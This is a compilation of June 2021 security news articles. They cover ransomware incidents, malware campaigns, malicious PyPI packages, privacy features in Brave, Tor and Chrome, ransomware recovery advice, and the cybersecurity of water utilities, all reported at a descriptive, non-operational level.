News: Security & Privacy News

Healthcare giant Grupo Fleury hit by REvil ransomware attack

Wed, 23 Jun 2021 21:33:41 +0000

Healthcare giant Grupo Fleury hit by REvil ransomware attack

Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.

Grupo Fleury is the largest medical diagnostics company in Brazil, with over 200 service centers and more than 10,000 employees. The company performs approximately 75 million clinical exams in a year.

Starting yesterday, the Fleury website began displaying an alert warning that they suffered an attack and that systems are no longer accessible.

Announcement on the website about the cyberattack

"Please be advised that our systems are currently unavailable and that we are prioritizing the restoration of services," read the alert translated into English.

"The causes of this unavailability originated from the attempted external attack on our systems, which are having operations reestablished with all the resources and technical efforts for the rapid standardization of our services."

With their systems shut down, business operations are disrupted, and patients are unable to schedule lab tests or other clinical exams online.

If you have first-hand information about this or other unreported cyberattacks, you can confidentially contact us on Signal at +16469613731 or on Wire at @lawrenceabrams-bc.

Grupo Fleury allegedly hit by ransomware

While local media has received confirmation that the company has suffered a cyberattack, Grupo Fleury has not officially confirmed a ransomware attack.

However, multiple cybersecurity sources have told BleepingComputer that Grupo Fleury suffered an attack by the ransomware operation known as REvil, also known as Sodinokibi.

This ransomware operation is responsible for numerous high-profile attacks, including Brazil's Rio Grande do Sul court system, nuclear weapons contractor Sol Oriens, and JBS, the world's largest meat producer.

In a sample of the ransomware used in the attack and shared with BleepingComputer, the REvil ransomware operation is demanding $5 million to receive a decryptor and not leak allegedly stolen files.

Ransom demand from sample shared with BleepingComputer

REvil is known for stealing files before encrypting devices and then using the stolen data as leverage to get a company to pay the ransom.

From the ransomware sample, no proof of stolen data or mention of the victim's name has been shared by the attackers at this time.

If data has been stolen, Grupo Fleury's data is of significant concern as it could contain enormous amounts of personal and medical data of patients.

BleepingComputer has contacted Grupo Fleury with further questions but has not received a response at this time.

Healthcare giant Grupo Fleury hit by REvil ransomware attack

Scammer arrested for phishing operation, sent 25,000 texts in a day

Wed, 23 Jun 2021 21:31:26 +0000

Scammer arrested for phishing operation, sent 25,000 texts in a day

The police has arrested an individual last week for sending fraudulent text messages to thousands of people to obtain banking details and defraud them.

It is estimated that the man sent more than 25,000 short text messages in one day, from SIM cards on multiple mobile devices.

Mobile phone contacts galore

The arrest took place on June 17 at a hotel in Manchester, UK, where the 21-years old fraudster had taken a room and used it as the headquarters of the phishing operation.

The fraudster is likely part of a larger gang and is probably just a foot soldier doing the risky part of the business for the more important players that run the larger operation.

Police officers found electronic equipment that could be used for SMS phishing, also known as smishing. The text messages claimed to be from the Hermes parcel delivery company.

According to the police, the operation was quite large and could deliver tens of thousands of fraudulent messages every day. It is estimated that close to 26,000 texts were sent on the day of the arrest.

At least some of the messages were sent through EE, one of the largest mobile network operators and internet service providers in the United Kingdom, with over 27 million subscribers.

The messages informed potential victims of a missed delivery and asked for banking information. The number of individuals falling victim to the scam remains undisclosed.

After examining the seized devices, the police say that they stored a total of 44,000 mobile phone contacts.

Despite the size of the phishing operation, the man got caught when the hotel staff deemed him suspicious for carrying a large number of cables in a bag and alerted the police in Manchester.

“What we have uncovered here are potentially the components of a highly sophisticated and authentic scam that I know many people not just in Greater Manchester but across the country have been potential victims of in recent weeks and months” - Mark Astbury, Detective Inspector of Greater Manchester Police’s City of Manchester Central division

People in the UK receiving suspicious text messages allegedly from Hermes should report the phishing attempt, contact the police online, or call 101.

As a side note, the fraudster's opsec skills are not the only ones needing an improvement. Phishing kit expert JCyberSec noticed that the Manchester police did not remove the metadata in the image published with the press release. Althlugh it is not the case now, metadata can include potentially sensitive information.

Scammer arrested for phishing operation, sent 25,000 texts in a day

John McAfee found dead by apparent suicide in Barcelona prison cell

Wed, 23 Jun 2021 21:17:29 +0000

John McAfee found dead by apparent suicide in Barcelona prison cell

McAFee's larger-than-life and often illegal antics came to define his later years.

Enlarge / John McAfee on his yacht off the coast of Cuba in 2019.

Adalberto ROQUE / AFP / Getty

John McAfee—the antivirus tycoon whose eccentric, larger-than-life, and often illegal antics on yachts and in tropical rain forests came to define him in later years—took his own life in a Spanish prison cell while awaiting extradition to the US. He was 75.

The death was first reported by El Pais and later by Reuters, both of which cited law enforcement sources in Barcelona. Multiple news agencies also reported the death.

According to El Pais, prison personnel found McAfee hanging in his cell and provided emergency medical services but were unable to save his life.

The reports came hours after revelations surfaced that McAfee would be extradited to the US to face federal indictments—one filed in March and the other in October—alleging a cryptocurrency pump-and-dump and tax evasion on millions of dollars in income.

McAfee was arrested in October at a Barcelona airport after dodging an international manhunt. He had been fighting extradition ever since. On Wednesday, Reuters reported that the extradition the US was seeking was approved by the high court in Spain and revealed in a court filing on Wednesday.

McAfee had been awaiting extradition when he died, police sources told El Pais.

John McAfee found dead by apparent suicide in Barcelona prison cell

Pakistan-linked hackers targeted Indian power company with ReverseRat

Wed, 23 Jun 2021 14:54:13 +0000

Pakistan-linked hackers targeted Indian power company with ReverseRat

A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.

"Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals."

Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021.

The intrusions are notable for a number of reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and the use of compromised domains in the same country as the targeted entity to host their malicious files.

At the same time, the group has been careful to hide their activity by modifying the registry keys, granting them the ability to maintain persistence on the target device without attracting attention surreptitiously.

Explaining the multi-step infection chain, Lumen noted the campaign "resulted in the victim downloading two agents; one resided in-memory, while the second was side-loaded, granting threat actor persistence on the infected workstations."

The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file (.lnk) and a decoy PDF file from a compromised domain.

The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA (HTML application) file from the same compromised website.

The lure documents largely describe events catering to India, disguising as a user manual for registering and booking an appointment for COVID-19 vaccine through the CoWIN online portal, while a few others masquerade as the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.

Irrespective of the PDF document displayed to the victim, the HTA file — itself a JavaScript code based on a GitHub project called CactusTorch — is leveraged to inject a 32-bit shellcode into a running process to ultimately install a .NET backdoor called ReverseRat that runs the typical spyware gamut, with capabilities to capture screenshots, terminate processes, execute arbitrary executables, perform file operations, and upload data to a remote server.

The custom-developed framework also comes with a third component in which a second HTA file is downloaded from the same domain to deploy the open-source AllaKore remote agent, potentially in an alternative attempt to maintain access to the compromised network.

"While this threat actor's targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest," the researchers said. "Despite previously relying upon open-source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchostt agent and other components of the ReverseRat project."

Source

Brave Search Beta is now available publicly

Tue, 22 Jun 2021 21:28:41 +0000

Brave Search Beta is now available publicly

Brave Search, a new search engine by the makers of Brave Browser, is now available publicly. Brave revealed some time ago that it was working on an independent search engine that would make use of its own index and not be dependent on Google, Bing or other search engines.

A private beta launched some time ago and today marks the end of that private beta period. Anyone may open Brave Search to use the search engine It is a beta product right now, but should work fine in many cases.

To better understand what Brave Search offers, one has to go back to March 2021. Brave announced that it acquired Tailcat, an open search engine developed by "by the team formerly responsible for the privacy search and browser products at Cliqz.

Tailcat uses its own independent index, and that sets its apart from third-party solutions such as DuckDuckGo or Startpage, which rely on the products of Big Tech companies such as Bing or Google.

Brave promises that its Search engine will provide users with quality results, but without compromising user security. The search engine does not record user IP addresses or will use personally identifiable information to change the search results.

Brave Search is developed using the same principles as the Brave browser:

Private: does not track or profile users.
User-First: Users come first, not advertising or data industries.
Choice: Private ads will come to search, similarly to how they are handled in Brave Browser. An ad-free paid search option will also become available.
Independent: Brave Search will use anonymized contributions to improve and refine Brave Search.
Transparent: Secret methods or algorithms won't be used to bias results.
Seamless: integration with the Brave Browser.
Open: Other search engines may use Brave Search.

Brave Search works like other search engines when you open it. You may type a search query, get suggestions, and will get results once you start the search.

The search results page resembles that of other search engines as well. You find options to switch from the "all" results listing to images, news or videos, and may filter results by country, safe search or time.

One interesting feature of Brave Search is that it may fill the results using data from third-party search engines, if its own set of data is not sufficient.

Select the cogwheel icon on the search results page to display the number of results that come from Brave's own index (in percent).

Another interesting feature of Brave Search is the option to set a location manually. Brave uses what it calls anonymous local results by default where necessary. Some queries work only if the location is known, e.g. when you search for restaurants near me, a location needs to be known as results would not make sense otherwise. Brave uses the IP but won't share it or store it.

You can turn this off in the settings or set a location manually that you want to be used as your location.

Still in the settings, you may disable the collection of anonymous usage metrics, and Google fallback mixing. The latter won't mix Google results in the search results if Brave's own index fails to deliver enough results on its own.

Brave Search uses an anonymous cookie to save preferences (when you make changes in the settings). A help page provides details on that.

Brave Search has no ads currently. Search results are displayed in blocks, and each block is clearly distinguishable from one another.

Some queries may display an option to display local results only, others may display widgets, e.g. the chart of a stock.

Closing Words

Brave Search is a beta product. I had the chance to use the search engine for several weeks on one device, and found it to return good results often. The fact that Brave maintains its own index is a plus, as it has full control over the results and since Brave claims that it will provide search results that are not biased, may soon become a go-to search engine for users who prefer that approach.

The Brave approach is interesting, especially since it may establish another source of revenue for the company in the long run. Not everyone is ready to pay for an ad-free search engine, but if you'd get unfiltered and unbiased results, it could certainly attract some users who are fed up with how the major search engines are run (especially in regards to bias and advertising).

Brave Search Beta is now available publicly

Mysterious ransomware payment traced to a sensual massage site

Tue, 22 Jun 2021 21:25:56 +0000

Mysterious ransomware payment traced to a sensual massage site

A ransomware targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages.

The attack was conducted by a more recent ransomware operation known as Ever101 who compromised an Israeli computer farm and proceeded to encrypt its devices.

In a new report by Israeli cybersecurity firms Profero and Security Joes, who performed incident response on the attack, the Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware.

When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer.

Example Ever101 ransom note

While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures.

"During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero's and Security Joe's report.

The known tools used by the Ever101 gang include:

xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder.
PH64.exe - 64-bit version of the Process Hacker program.
Cobalt Strike - The threat actors deployed cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature.
SystemBC - SystemBC was used to proxy Cobalt Strike traffic through SOCKS5 proxy to avoid detection.

Other tools were also found but were encrypted by the ransomware. Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well:

SoftPerfect Network Scanner - An IPv4/IPv6 network scanner.
shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device.
NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives.

Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic.

WinRar with Arabic localization

Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization to some of these tools is a "false flag."

Following the money to a sensual massage

Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets.

While tracing the payment, they found a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site.

RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures.

Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage.

RubRatings Bitcoin Tip Jar

The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then used the coins to tip a masseuse, or more likely, use the site as a way to launder the ransom payment.

"The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers."

"The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC."

As bitcoin is becoming more easily traced, and even recovered by law enforcement, ransomware operations are looking for novel approaches to launder their ill-gotten gains.

It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse.

Mysterious ransomware payment traced to a sensual massage site

Malicious PyPI packages hijack dev devices to mine cryptocurrency

Tue, 22 Jun 2021 21:23:13 +0000

Malicious PyPI packages hijack dev devices to mine cryptocurrency

This week, multiple malicious packages were caught in the PyPI repository for Python projects that turned developers' workstations into cryptomining machines.

All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects.

Bash script pulls in miner

A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April:

maratlib
maratlib1
matplatlib-plus
mllearnlib
mplatlib
learninglib

All came from user “nedog123” and the names of most of them are misspelled versions of the matplotlib legitimate plotting software.

Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a blog post, noting that it was used as a dependency by the other malicious components.

“For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes.

While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available.

Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine.

The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for Ubiq cryptocurrency (UBQ).

In another variant, the script included a different cryptomining program that uses GPU power, the open-source T-Rex.

Attackers are constantly targeting open-source code repositories like PyPI [1, 2, 3], the NPM for NodeJS [1, 2, 3], or RubyGems. Even if the detection comes when the download count is low, as it typically happens, there is a significant risk as developers may integrate the malicious code in widely used projects.

In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371.

Malicious PyPI packages hijack dev devices to mine cryptocurrency

Monero emerges as crypto of choice for cybercriminals

Tue, 22 Jun 2021 21:18:51 +0000

Monero emerges as crypto of choice for cybercriminals

Untraceable "privacy coin" is rising in popularity among ransomware gangs.

For cybercriminals looking to launder illicit gains, bitcoin has long been the payment method of choice. But another cryptocurrency is coming to the fore, promising to help make dirty money disappear without a trace.

While bitcoin leaves a visible trail of transactions on its underlying blockchain, the niche “privacy coin” monero was designed to obscure the sender and receiver, as well as the amount exchanged.

As a result, it has become an increasingly sought-after tool for criminals such as ransomware gangs, posing new problems for law enforcement.

The rise of monero comes as authorities race to crack down on cyber crime in the wake of a series of audacious attacks, notably the hack on the Colonial Pipeline, a major petroleum artery supplying the US east coast.

“We’ve seen ransomware groups specifically shifting to monero,” said Bryce Webster-Jacobsen, director of intelligence at GroupSense, a cyber security group that has helped a growing number of victims pay out ransoms in monero. “[Cyber criminals] have recognized the ability for mistakes to be made using bitcoin that allow blockchain transactions to reveal their identity.”

Russia-linked REvil, the notorious ransomware group believed to be behind the attack this month on meatpacker JBS, has removed the option of paying in bitcoin this year, demanding monero only, according to Brett Callow, threat analyst at Emsisoft.

Meanwhile, both DarkSide, the group blamed for the Colonial Pipeline hack, and Babuk, which was behind the attack on Washington DC police this year, allow payments in either cryptocurrency but charge a 10 to 20 percent premium to victims paying in riskier bitcoin, experts say.

Justin Ehrenhofer, a cryptocurrency compliance expert and member of the monero developer community, said that at the beginning of 2020, its use by ransomware gangs was “a rounding error.” Today he estimates that about 10 to 20 percent of ransoms are paid in monero and that the figure will probably rise to 50 percent by the end of the year.

Fungible money

Monero was launched as an open source project in 2014 by a user of a bitcoin forum with the pseudonym “thankful_for_today.” Its original white paper argued that bitcoin’s traceability was a “critical flaw,” adding that “privacy and anonymity are the most important aspects of electronic cash.”

Ehrenhofer is among those who argue that bitcoin’s visibility should be rejected in favor of a fully private financial system. “The main goal is transaction indistinguishability—to make private and fungible money,” he said. “We want to make monero as similar to cash as possible, where one $10 bill is the same as another and the merchant doesn’t know where they came from.”

While the currency has enjoyed a more than fivefold rise in price since the beginning of 2020, tracking the wider cryptocurrency rally, its overall market capitalization remains a sliver of that of bitcoin: nearly $5 billion compared with $727 billion, according to data from CoinMarketCap.

Still, it has inspired a loyal following among privacy idealists and anti-establishment cryptography hobbyists such as Ehrenhofer, who are dedicated to maintaining its code and using advanced mathematics to try to ensure its transactions remain untraceable. It now has the third-largest community of developers of any cryptocurrency, behind bitcoin and ethereum, data show.

But monero has also attracted controversy since its inception, thanks to its association with illicit payments and money laundering. Dr Tom Robinson, chief scientist and cofounder of blockchain intelligence group Elliptic, said an increasing number of marketplaces on the dark web exclusively accepted monero for sales of everything from guns to drugs. “That’s been a big shift over the past year.”

Meanwhile, ransomware negotiators, who are typically hired by victims to help handle extortion payments, have also begun contacting monero developers in order to understand how the cryptocurrency works, according to Ehrenhofer. The negotiators aimed to “build out the liquidity relationships” needed to facilitate payment in the event of a monero ransom demand, he said.

Hidden trails

The absence of a digital trail for monero is proving increasingly problematic for law enforcement, which typically works with private sector cryptocurrency analytics groups to trace suspect transactions on bitcoin’s digital ledger.

Europol, in a 2020 report, placed privacy coins among the factors that had “rendered cryptocurrency investigations more challenging and [that] we can expect these to feature more prominently in future investigations.”

In September last year, the US Internal Revenue Service offered a bounty of $625,000 for any contractors able to develop tools to help trace monero. The agency has since awarded the contract to cryptocurrency forensics group Chainalysis and data analysis group Integra FEC.

Other cryptocurrency forensics groups have also quietly been attempting to do the same. CipherTrace chief executive Dave Jevans said his company had started working on the currency more than two years ago under a contract with the US homeland security department and had filed patent applications as part of the work but would not share further details.

Some experts say it is unlikely that ransomware gangs will switch to demanding monero exclusively because difficulty in sourcing it could make victims less likely to pay up.

Many point to challenges around its liquidity and availability, meaning only smaller transactions may be possible. “If you pick a currency that’s too obscure, the very act of purchasing the currency can make [it] more expensive to purchase. That creates levels of unpredictability in a negotiation,” said Eric Friedberg, co-president of Aon-owned cyber security group Stroz Friedberg.

Others note that given the currency's opaqueness, it is impossible to ascertain whether or not your transactions are with sanctioned entities—which could risk severe penalties.

Multiple experts say US legislators are so far steering away from singling out any particular cryptocurrency when drafting relevant legislation. Still, many big cryptocurrency exchanges have shied away from listing privacy coins for fear of attracting regulatory scrutiny, as authorities increasingly insist on higher know-your-customer and money-laundering standards.

As a result, some ransomware negotiators remain nervous of any involvement with monero.

“If a client wants to do anything in a privacy coin, we don’t support it,” said Bill Siegel, chief executive of Coveware, one of the most popular ransom negotiator companies. “We understand what the attitude is from a regulatory standpoint and we want to be helpful to law enforcement.”

Monero emerges as crypto of choice for cybercriminals

Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

Tue, 22 Jun 2021 13:05:51 +0000

Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

Cybersecurity researchers have disclosed a new ransomware strain called "DarkRadiation" that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.

"The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."

As of writing, there's no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.

The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor's infrastructure (IP address "185.141.25.168") in a directory called "api_attack." The toolset was first noticed by Twitter user @r3dbU7z on May 28.

DarkRadiation's infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.

Encryption Process

Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called "node-bash-obfuscate" to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.

Upon execution, DarkRadiation checks if it's run as the root user, and if so, uses the elevated permissions to download and install Wget, cURL, and OpenSSL libraries, and takes a periodic snapshot of the users that are currently logged into a Unix computer system using the "who" command every five seconds, the results of which are then exfiltrated to an attacker-controlled server using the Telegram API.

"If any of these are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS," SentinelOne researchers explained in a write-up published Monday.

The ransomware, in its final phase of the infection, retrieves a list of all available users on the compromised system, overwrites existing user passwords with "megapassword," and deletes all shell users, but not before creating a new user with the username "ferrum" and password "MegPw0rD3" to proceed with the encryption process.

Worm-like Spreading Functionality

Interestingly, SentinelOne's analysis reveals different variations wherein the password for the user "ferrum" is downloaded from the attacker's C2 server in few versions, while in others, it is hardcoded with strings such as "$MeGaPass123#," implying that the malware is undergoing rapid changes prior to actual deployment.

"It must be noted that the ransomware appends radioactive symbols ('.☢') as a file extension for an encrypted file," Trend Micro threat researcher Aliakbar Zahravi said.

A second moving part associated with the attack is an SSH worm that's engineered to receive a credential configuration in the form of a base64-encoded parameter that's used to connect to the target system using the SSH protocol and eventually download and execute the ransomware.

In addition to reporting the execution status, along with the encryption key, back to the adversary's Telegram channel through the API, DarkRadiation also comes with capabilities to stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user.

"Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods," SentinelOne researchers said.

"As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files."

Source

Tor Browser fixes vulnerability that tracks you using installed apps

Tue, 22 Jun 2021 04:16:39 +0000

Tor Browser fixes vulnerability that tracks you using installed apps

The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices.

In May, JavaScript fingerprinting firm FingerprintJS disclosed a 'scheme flooding' vulnerability that allows the tracking of users across different browsers based on the applications installed on their device.

To track users, a tracking profile is created for a user by attempting to open various application URL handlers, such as zoommtg://, and checking if the browser launches a prompt, like the one for Zoom below..

Zoom URL Handler

If the application's prompt is displayed, it can be assumed that the application is installed on the device. By checking for numerous URL handlers, the vulnerability can create an ID based on the unique configuration of installed apps on the user's device.

This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari.

This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged with sites. As this vulnerability tracks users across browsers, it could allow web sites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome.

With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false.

This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts.

Full changelog

The full changelog for Tor 10.0.18 is:

All Platforms
- Update Tor to 0.4.5.9
Android
- Update Fenix to 89.1.1
- Update NoScript to 11.2.8
- Bug 40055: Rebase android-components patches on 75.0.22 for Fenix 89
- Bug 40165: Announce v2 onion service deprecation on about:tor
- Bug 40166: Hide "Normal" tab (again) and Sync tab in TabTray
- Bug 40167: Hide "Save to Collection" in menu
- Bug 40169: Rebase fenix patches to fenix v89.1.1
- Bug 40170: Error building tor-browser-89.1.1-10.5-1
- Bug 40432: Prevent probing installed applications
- Bug 40470: Rebase 10.0 patches onto 89.0
Build System
- Android
  - Bug 40290: Update components for mozilla89-based Fenix

You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates.

You can also download the latest browser from the Tor Browser download page and the distribution directory.

Tor Browser fixes vulnerability that tracks you using installed apps

Frontpaged: Tor Browser 10.0.18

5 Critical Steps to Recover From a Ransomware Attack

Mon, 21 Jun 2021 23:02:25 +0000

5 Critical Steps to Recover From a Ransomware Attack

Hackers are increasingly using ransomware as an effective tool to disrupt businesses and fund malicious activities.

A recent analysis by cybersecurity company Group-IB revealed ransomware attacks doubled in 2020, while Cybersecurity Venture predicts that a ransomware attack will occur every 11 seconds in 2021.

Businesses must prepare for the possibility of a ransomware attack affecting their data, services, and business continuity. What steps are involved in recovering from a ransomware attack?

Isolate and shutdown critical systems

Enact your business continuity plan

Report the cyberattack

Restore from backup

Remediate, patch, and monitor

Isolate and shutdown critical systems

The first important step is to isolate and shut down business-critical systems. There is a chance the ransomware has not affected all accessible data and systems. Shutting down and isolating both infected systems and healthy systems helps contain malicious code.

From the first evidence of ransomware on the network, containment should be a priority. Containment and isolation can include isolating systems from a network perspective or powering them down altogether.

Enact your business continuity plan

The business continuity plan and its disaster recovery component are essential to maintaining some level of business operations.

The business continuity plan is a step-by-step playbook that helps all departments understand how the business operates in times of disaster or other business-altering scenarios. The disaster recovery component details how critical data and systems can be restored and brought back online.

Report the cyberattack

Many businesses may hesitate to do so, but reporting the attack to customers, stakeholders, and law enforcement is essential. Law enforcement agencies can provide access to resources that may not be available otherwise.

You will also need to consider compliance regulations. The GDPR, for example, provides businesses with a 72-hour window to disclose a data breach involving customers' personal information.

Restore from backup

The best protective measure you have for your data is backups. However, restoring large quantities of data can be time-consuming, forcing the business to be offline for an extended period of time.

This situation highlights the need to discover and contain ransomware infections as quickly as possible to reduce the amount of data that needs recovering.

Remediate, patch, and monitor

In the final phase of recovering from a ransomware attack, companies remediate the ransomware infection, patch systems that may have led to the initial ransomware compromise, and monitor the environment closely for further malicious activity.

It is not unheard of for malicious activity to continue, even if the ransom is paid, or if infected systems were restored. If the same vulnerability exists that led to the initial attack, the environment can become compromised once again.

Remediate common entry points for ransomware

As businesses look to bolster the environment against ransomware and other malicious threats, it is crucial to look at the common entry points for these types of attacks.

Cyberattacks use phishing attacks to harvest stolen credentials which can then be used to launch a ransomware attack, or access systems directly.

Prevention and next steps

Businesses must not be careless in handling password security, especially with Active Directory user accounts.

Unfortunately, Active Directory does not have good native security tools for securing passwords in line with today's password security policy requirements.

Specops Password Policy provides breached password protection, disallowed password lists, and many other robust security features to protect your environment. It takes the very basic password policies available in Active Directory and aligns them with modern guidance from NIST and other cybersecurity authorities.

Learn more about Specops Password Policy and download a free trial to protect your environment from vulnerable passwords.

Source

Google Chrome on iOS is getting an enhanced privacy feature

Mon, 21 Jun 2021 21:27:09 +0000

Google Chrome on iOS is getting an enhanced privacy feature

Google Chrome for iOS now allows you to lock your incognito tabs behind Face ID so other people can't snoop on what sites you are visiting.

Google Chrome's incognito mode is commonly used to visit sensitive sites that people do not want to appear in the browser history or for cookies to be saved.

If a user leaves their phone unlocked, nothing prevents another person from viewing what tabs are currently open in Incognito mode.

Google Chrome for iOS now includes an additional experimental privacy feature that allows you to lock Incognito mode behind your iPhone's Face ID authentication feature so that only you can access the open tabs.

Once enabled, when attempting to open the secured Incognito tabs in Chrome for iOS, the browser will prompt the person to authenticate using Face ID, as shown below.

Chrome Incognito tabs locked behind Face ID

Once Incognito mode has been unlocked with Face ID, you will not have to unlock it again until you close and open the browser again.

As Google is still testing this feature, you have to enable it via the chrome://flags page using the following steps:

Open Chrome and enter chrome://flags in the address bar, and press Go on the virtual keyboard.
When the Chrome 'Experiments' page opens, search for 'Device Authentication for Incognito' and enabled it.

Enabling experimental feature
Now close and reopen the Chrome browser.
When Chrome is started again, go into Settings > Privacy and enable the 'Lock Incognito Tabs when you close Chrome' setting as shown below.

Chrome for iOS Privacy settings

Now that the feature is enabled, every time you try to access your Chrome Incognito tabs, it will prompt you to unlock them with Face ID.

To disable this feature, simply toggle off the 'Lock Incognito Tabs WhenYou Close Chrome' in the settings.

Google Chrome on iOS is getting an enhanced privacy feature

How Cyber Safe is Your Drinking Water Supply?

Mon, 21 Jun 2021 21:17:37 +0000

How Cyber Safe is Your Drinking Water Supply?

Amid multiple recent reports of hackers breaking into and tampering with drinking water treatment systems comes a new industry survey with some sobering findings: A majority of the 52,000 separate drinking water systems in the United States still haven’t inventoried some or any of their information technology systems — a basic first step in protecting networks from cyberattacks.

The Water Information Sharing and Analysis Center (WaterISAC) — an industry group that tries to facilitate information sharing and the adoption of best practices among utilities in the water sector — surveyed roughly 600 employees of water and wastewater treatment facilities nationwide, and found 37.9 percent of utilities have identified all IT-networked assets, with an additional 21.7 percent working toward that goal.

The ISAC found when it comes to IT systems tied to “operational technology” (OT) — systems responsible for monitoring and controlling the industrial operation of these utilities and their safety features — just 30.5 percent had identified all OT-networked assets, with an additional 22.5 percent working to do so.

“Identifying IT and OT assets is a critical first step in improving cybersecurity,” the report concluded. “An organization cannot protect what it cannot see.”

It’s also hard to see threats you’re not looking for: 67.9 percent of water systems reported no IT security incidents in the last 12 months, a somewhat unlikely scenario.

Michael Arceneaux, managing director of the WaterISAC, said the survey shows much room for improvement and a need for support and resources.

“Threats are increasing, and the sector, EPA, CISA and USDA need to collaborate to help utilities prevent and recover from compromises,” Arceneaux said on Twitter.

While documenting each device that needs protection is a necessary first step, a number of recent cyberattacks on water treatment systems have been blamed on a failure to properly secure water treatment employee accounts that can be used for remote access.

In April, federal prosecutors unsealed an indictment against a 22-year-old from Kansas who’s accused of hacking into a public water system in 2019. The defendant in that case is a former employee of the water district he allegedly hacked.

In February, we learned that someone hacked into the water treatment plan in Oldsmar, Fla. and briefly increased the amount of sodium hydroxide (a.k.a. lye used to control acidity in the water) to 100 times the normal level. That incident stemmed from stolen or leaked employee credentials for TeamViewer, a popular program that lets users remotely control their computers.

In January, a hacker tried to poison a water treatment plant that served parts of the San Francisco Bay Area, reports Kevin Collier for NBCNews. The hacker in that case also had the username and password for a former employee’s TeamViewer account.

Image: WaterISAC.

